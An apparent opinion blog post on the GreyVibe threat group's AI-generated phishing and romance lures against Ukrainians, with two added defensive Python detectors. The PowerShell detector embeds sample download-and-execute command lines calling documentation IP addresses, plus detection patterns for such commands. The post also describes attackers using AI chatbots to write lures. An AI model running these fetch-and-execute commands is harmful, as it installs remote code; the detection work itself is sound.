Let me be blunt: the most dangerous hackers aren’t the ones with perfect code. They’re the ones who don’t care if their phishing emails look like they were written by a grad student who just finished their first ChatGPT tutorial.
That’s GreyVibe.
They’re not sophisticated. They don’t have the discipline of a nation-state. Their malware sometimes leaves behind debug logs. They upload test samples to public scanners. They even deploy cryptocurrency miners on victim machines — which is, frankly, a weird flex for a group supposedly backed by the Kremlin.
But here’s the thing: none of that matters.
Because they’re winning.
They’re using AI to generate fake Ukrainian government portals, fake dating sites with live video calls from "women" who don’t exist, and fake charity pages for FPV drones that Ukrainian soldiers actually care about. And they’re getting in. Not because they’re genius coders. But because they’re relentless, opportunistic, and terrifyingly good at exploiting human curiosity.
I’ve seen state actors. I’ve seen ransomware gangs. GreyVibe? They’re something new. A hybrid. Part ex-TrickBot thug, part Russian intelligence asset, all fueled by Gemini and ChatGPT.
And if you think your EDR will catch them because their code is "amateurish," you’re already behind.
The Lures Are Real. The Targets Are Human.
WithSecure found a campaign called PrincessClub — fake Ukrainian adult dating sites. Not just static pages. They used Telegram bots to impersonate women. Then they added WebRTC live video calls. Real-time video. Audio. All captured by malware.
This isn’t "spear phishing." This is emotional manipulation at scale.
The victims aren’t just clicking links. They’re flirting. They’re sharing. They’re trusting.
And GreyVibe? They didn’t need a zero-day. They didn’t need to compromise a cloud provider. They just needed to make someone feel seen.
There’s a Ukrainian military analyst who got a message on Telegram: "Hey, I saw your post about the drone strike. I’m in Kharkiv. Can we talk?" He replied. He video-called. He downloaded the "security update" to fix his Zoom connection.
That’s how they got in.
The malware? LegionRelay. A PowerShell RAT. Nothing fancy. But it stole his WhatsApp chats and his browser passwords, recorded his screen, and sent it all to a server in Moscow.
The AI didn’t write the code. But it wrote the lie.
PhantomMail, PhantomClick, and the Art of the Fake Error
They didn’t just build fake websites. They built fake experiences.
PhantomMail: Emails that look like they came from Ukraine’s emergency services. They attach ZIP files with decoy PDFs — but the real payload is a RAR archive with a malicious script disguised as a "corrupted file recovery tool." The subject line? "URGENT: Your report was flagged for review."
PhantomClick: Fake CAPTCHA pages that mimic Zoom and LAPAS login screens. But instead of solving a puzzle, you’re running a PowerShell command that downloads a dropper. The page says: "Verifying your Cloudflare connection… please click here to confirm."
And here’s the kicker: the error messages? They’re written in Russian. With Cyrillic typos. Not the kind of typos you’d expect from a native speaker. The kind you get when an AI translates "Please confirm your identity" into Russian and then back again.
I’ve seen this before. In 2022, Russian cyber units used Google Translate to generate phishing emails. They got caught because the grammar was terrible.
GreyVibe? They’re doing it again. But this time, they’re not trying to hide it.
They know most people won’t notice. And the ones who do? They’ll assume it’s a low-level actor. Not worth their time.
That’s the trap.
The Malware Isn’t the Weapon. The Misdirection Is.
Look at the tools: LOOKVALPS, DAYLIGHT, TEASOUP. Obfuscators. Custom. Probably built with LLM help.
But here’s what’s interesting: they’re not using them to hide from analysts. They’re using them to hide from automation.
Signature-based EDR rules look for known PowerShell strings. GreyVibe's samples don't contain them. They're obfuscated with tooling that isn't in any public repository, so the EDR returns no verdict and your threat intel feed says "no match."
And meanwhile, the malware is dumping Telegram session cookies and capturing screenshots of military maps.
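The PhantomClick lure has the victim run a PowerShell command, and the whole point of the obfuscators is that the command never matches a fixed string. What follows is an added example in Python of a rule that scores structure instead of strings; it is not code from the article or from WithSecure's analysis. The events are constructed Sysmon-style records, the obfuscated payload, signal weights and alert threshold are assumptions made for the demonstration, and the IP addresses come from documentation ranges.

```python
"""Score PowerShell process-creation events on structure, not known strings:
decode -EncodedCommand, then look for a hidden window, policy bypass,
download-and-execute primitives, string splicing and an interactive parent."""
import base64
import re

# Constructed payload (assumption): 'i'+'ex' is spliced so a plain "iex"
# signature never matches, then the whole script is hidden behind -enc.
OBFUSCATED = ("$a='Net.WebClient';$b=New-Object $a;"
              "&('i'+'ex') $b.DownloadString('http://198.51.100.7/c.txt')")
ENCODED = base64.b64encode(OBFUSCATED.encode("utf-16le")).decode("ascii")

# Constructed Sysmon-style events, not real telemetry. IPs are TEST-NET ranges.
EVENTS = [
    {"id": "benign-scheduled-task",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\Backup-Logs.ps1 -Days 7"},
    {"id": "fake-captcha-run-dialog",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc " + ENCODED},
    {"id": "browser-spawned-oneliner",
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": 'powershell -nop -w hidden -c "iex (irm http://203.0.113.9/a)"'},
]

_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# name: (pattern, weight). Weights and thresholds are assumed tuning values.
SIGNALS = {
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 2),
    "policy_bypass": (re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I), 1),
    "download": (re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest"
                            r"|invoke-restmethod|\biwr\b|\birm\b|start-bitstransfer", re.I), 2),
    "invoke": (re.compile(r"\biex\b|invoke-expression|&\s*\(", re.I), 2),
    "string_splicing": (re.compile(r"['\"]\s*\+\s*['\"]"), 2),
    "char_casting": (re.compile(r"\[char\]\s*\d+|-join\b", re.I), 1),
}
INTERACTIVE_PARENTS = {"explorer.exe", "msedge.exe", "chrome.exe", "firefox.exe",
                       "winword.exe", "excel.exe", "outlook.exe"}
SYMBOL_DENSITY_THRESHOLD = 0.3
ALERT_THRESHOLD = 4


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -enc/-EncodedCommand, or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def symbol_density(text):
    """Share of characters that are neither alphanumeric nor whitespace."""
    symbols = sum(1 for c in text if not (c.isalnum() or c.isspace()))
    return symbols / max(1, len(text))


def score_event(event):
    """Return (score, signal names) for one process-creation event."""
    raw = event["CommandLine"]
    decoded = decode_encoded_command(raw)
    script = decoded if decoded is not None else raw
    haystack = raw + "\n" + script          # match both the raw and decoded forms
    signals, score = [], 0
    if decoded is not None:
        signals.append("encoded_command")
        score += 2
    for name, (pattern, weight) in SIGNALS.items():
        if pattern.search(haystack):
            signals.append(name)
            score += weight
    if symbol_density(script) >= SYMBOL_DENSITY_THRESHOLD:
        signals.append("symbol_dense")
        score += 1
    if event["ParentImage"].rsplit("\\", 1)[-1].lower() in INTERACTIVE_PARENTS:
        signals.append("interactive_parent")
        score += 2
    return score, signals


def triage(events, threshold=ALERT_THRESHOLD):
    """Map event id -> (score, signals) for events that reach the threshold."""
    hits = {}
    for ev in events:
        score, signals = score_event(ev)
        if score >= threshold:
            hits[ev["id"]] = (score, signals)
    return hits
```

The spliced payload never contains the literal "iex", so a string match on the raw command line finds nothing; decoding the -enc argument first and then scoring on window state, download cmdlets, splicing density and the fact that explorer.exe or a browser spawned the shell is what separates it from the scheduled backup script.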
The real genius? The misdirection.
They’re deploying cryptocurrency miners on some machines. That’s not for profit. That’s to make you think they’re just another ransomware gang. To confuse attribution. To waste your SOC’s time chasing phantom Bitcoin wallets while they’re exfiltrating Ukrainian defense plans.
And the Nebo campaign? Fake Russian military login pages — designed to trick Ukrainian soldiers into thinking they’re logging into a Russian terminal.
That’s not just phishing. That’s psychological warfare.
Hybrid Threats Don’t Care About Labels
WithSecure says GreyVibe might be a mix of former cybercriminals and state-backed actors.
I believe that.
The evidence? Early samples of their ISO builder matched UAC-0098 — a group of ex-TrickBot operators who targeted Ukraine in 2022. That’s not coincidence. That’s a pipeline.
These aren’t Kremlin officers. They’re guys who used to sell RDP access on dark web forums. Now they’re getting paid in rubles to run AI-generated lures.
And that’s the future.
The next wave of cyberwarfare won’t be led by elite hackers. It’ll be led by contractors. People who don’t care about glory. Who just want to get paid. Who use AI to automate the boring parts — writing fake emails, generating fake personas, crafting fake urgency.
The code? It’s bad. The infrastructure? Clunky. But the human cost? Real.
What You Can Do (And What You Can’t)
You can’t stop AI-generated lures. Not entirely. Not without turning your entire organization into a fortress.
But you can change how you respond.
Stop looking for perfect code. Start looking for human patterns.
If someone’s clicking a link because they think they’re talking to a woman in Kharkiv — that’s not a technical failure. That’s a social one.
Train your team to recognize emotional hooks. Teach them to question "urgent" messages from unknown contacts. Especially if they come with video calls or "security updates."
And if you’re using automated threat detection? Make sure your rules look for inconsistencies, not just known-bad hashes. Cyrillic characters hiding inside English words. Date headers stamped with a time zone the claimed sender couldn’t be in. Link text that shows one domain while the href points at another.
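Those three inconsistencies can be checked mechanically. The following is an added example, not from the article or any vendor, that runs all three over one constructed message: the sender domain, the Date header, the link and the per-TLD clock table are assumptions made up for the demonstration, and the registrable-domain logic is a deliberate two-label approximation rather than a public-suffix lookup.

```python
"""Lure checks on one raw email: mixed-script (homoglyph) words, a Date offset
the claimed sender region could not have produced, and link text naming a
different domain than the href really targets."""
import re
import unicodedata
from datetime import datetime, timedelta, timezone
from email import message_from_bytes
from email.utils import parseaddr, parsedate_to_datetime
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample, not a real capture: claims a Ukrainian emergency-services
# sender, is dated in January at +0300 (Kyiv is +0200 then), spells "Your" with
# a Cyrillic о (U+043E), and shows the claimed domain as link text while the
# href points at an unrelated host.
SAMPLE_EMAIL = (
    "From: Alerts <alerts@emergency.example.ua>\r\n"
    "Date: Mon, 15 Jan 2024 10:12:00 +0300\r\n"
    "Subject: URGENT: Your report was flagged for review\r\n"
    'Content-Type: text/html; charset="utf-8"\r\n'
    "\r\n"
    "<html><body><p>Y\u043eur report was flagged. Confirm within 24 hours:</p>"
    '<a href="https://emergency-example-ua.review-portal.example.net/confirm">'
    "https://emergency.example.ua/review</a></body></html>\r\n"
)

# Assumed, simplified clock model per sender TLD: standard UTC offset and
# whether the region follows the EU daylight-saving calendar.
TLD_CLOCK = {"ua": (2, True), "ru": (3, False)}


def _last_sunday_utc(year, month, hour):
    nxt = (datetime(year, month, 1, tzinfo=timezone.utc) + timedelta(days=31)).replace(day=1)
    last = nxt - timedelta(days=1)
    return (last - timedelta(days=(last.weekday() + 1) % 7)).replace(hour=hour)


def expected_offset_hours(at_utc, tld):
    """UTC offset (hours) the claimed region would be on at the given instant."""
    std, eu_dst = TLD_CLOCK[tld]
    if not eu_dst:
        return std
    start = _last_sunday_utc(at_utc.year, 3, 1)   # EU DST starts 01:00 UTC
    end = _last_sunday_utc(at_utc.year, 10, 1)    # and ends 01:00 UTC
    return std + 1 if start <= at_utc < end else std


def timezone_mismatch(msg):
    """(header_offset, expected) if the Date cannot come from the claimed region."""
    tld = parseaddr(msg.get("From", ""))[1].rsplit(".", 1)[-1].lower()
    if tld not in TLD_CLOCK or not msg.get("Date"):
        return None
    sent = parsedate_to_datetime(msg["Date"])
    header_offset = sent.utcoffset().total_seconds() / 3600
    expected = expected_offset_hours(sent.astimezone(timezone.utc), tld)
    return None if header_offset == expected else (header_offset, expected)


class LinkCollector(HTMLParser):
    """Collects [href, visible text] per anchor and all visible text."""
    def __init__(self):
        super().__init__()
        self.links, self.text, self._in_anchor = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.links.append([dict(attrs).get("href", ""), ""])
            self._in_anchor = True

    def handle_endtag(self, tag):
        if tag == "a":
            self._in_anchor = False

    def handle_data(self, data):
        self.text.append(data)
        if self._in_anchor and self.links:
            self.links[-1][1] += data


_HOST_RE = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


def registrable(host):
    # Crude registrable-domain approximation (assumption): last two labels.
    return ".".join(host.lower().split(".")[-2:])


def link_mismatches(links):
    """Anchors whose visible text names a domain other than the href's."""
    out = []
    for href, text in links:
        shown = _HOST_RE.search(text)
        target = urlparse(href).hostname or ""
        if shown and target and registrable(shown.group(1)) != registrable(target):
            out.append((text.strip(), target))
    return out


def _script(ch):
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name.startswith(("LATIN", "CYRILLIC")) else None


def mixed_script_words(text):
    """Words mixing Latin and Cyrillic letters, the homoglyph tell."""
    return [w for w in re.findall(r"\w+", text)
            if len({_script(c) for c in w if c.isalpha()} - {None}) > 1]


def analyze(raw):
    """Run all three checks on one raw RFC 5322 message given as text."""
    msg = message_from_bytes(raw.encode("utf-8"))
    body = msg.get_payload(decode=True).decode(msg.get_content_charset() or "utf-8")
    parser = LinkCollector()
    parser.feed(body)
    return {
        "mixed_script_words": mixed_script_words(" ".join(parser.text)),
        "timezone_mismatch": timezone_mismatch(msg),
        "link_mismatches": link_mismatches(parser.links),
    }
```

Parsing from bytes matters: feeding the message as a str makes the email module mangle non-ASCII body text on decode, which would hide exactly the Cyrillic character the first check is looking for.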
GreyVibe isn’t the endgame.
It’s the prototype.
The next group? They’ll be better. They’ll use more advanced models. They’ll avoid typos. They’ll make their lures flawless.
But they’ll still need humans to click.
And that? That hasn’t changed.
Final Thought: The AI Didn’t Make Them Dangerous. We Did.
We built the tools. We trained the models. We fed them with everything — from Ukrainian military forums to dating app profiles to emergency broadcast scripts.
And now we’re surprised when they use it?
GreyVibe isn’t the monster.
We are.
We made the weapon.
They just learned how to pull the trigger.